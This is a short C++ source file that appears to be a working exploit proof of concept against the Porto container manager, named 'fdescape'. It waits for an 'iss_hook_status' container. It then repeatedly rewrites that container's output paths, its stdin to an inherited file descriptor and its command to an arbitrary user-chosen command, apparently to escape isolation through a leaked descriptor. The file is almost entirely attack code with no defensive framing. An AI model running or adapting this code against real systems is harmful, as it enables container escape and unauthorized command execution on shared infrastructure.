#include <library/cpp/getopt/last_getopt.h>
#include <infra/porto/api/libporto.hpp>
#include <util/generic/scope.h>
#include <util/system/fs.h>


int main(int argc, char **argv) {
    using namespace NLastGetopt;
    TOpts opts = TOpts::Default();

    int fd = 23;
    opts.AddLongOption("fd", "ISS fd to use")
            .DefaultValue(fd)
            .StoreResult(&fd);

    TString cmd = "ls -la /dev/stdin/";
    opts.AddLongOption("cmd", "command to execute")
            .DefaultValue(cmd)
            .StoreResult(&cmd);

    TOptsParseResult args(&opts, argc, argv);

    const TString stdoutPath = "/fdescape.out";
    const TString stderrPath = "/fdescape.err";

    NFs::Remove(stdoutPath);
    NFs::Remove(stderrPath);

    Porto::TPortoApi api;
    // wait core container
    TString name = "***iss_hook_status";
    for (;;) {
        TString state;
        Cerr << "[+] wait iss_hook_status container" << Endl;
        auto err = api.WaitContainers({name}, name, state, -1);
        if (err != Porto::EError::Success) {
            Cerr << "failed to wait: " << state << Endl;
            continue;
        }

        Cerr << "[+] spotted iss_hook_status container" << Endl;

        // sanity check
        for (;;) {
            if (api.SetProperty(name,  "stdout_path", stdoutPath) != Porto::EError::Success) {
                continue;
            }

            (void)api.SetProperty(name, "stderr_path", stderrPath);
            break;
        }

        for (int i = 0; i < 10; i++) {
            (void)api.SetProperty(name, "stdin_path", "/dev/fd/" + ToString(fd));
            (void)api.SetProperty(name, "command", cmd);
            usleep(50);
        }

        break;
    }

    Cerr << "[+] seems all done" << Endl;
    Cout << "stdout: " << stdoutPath << Endl;
    Cout << "stderr: " << stderrPath << Endl;
    return 0;
}
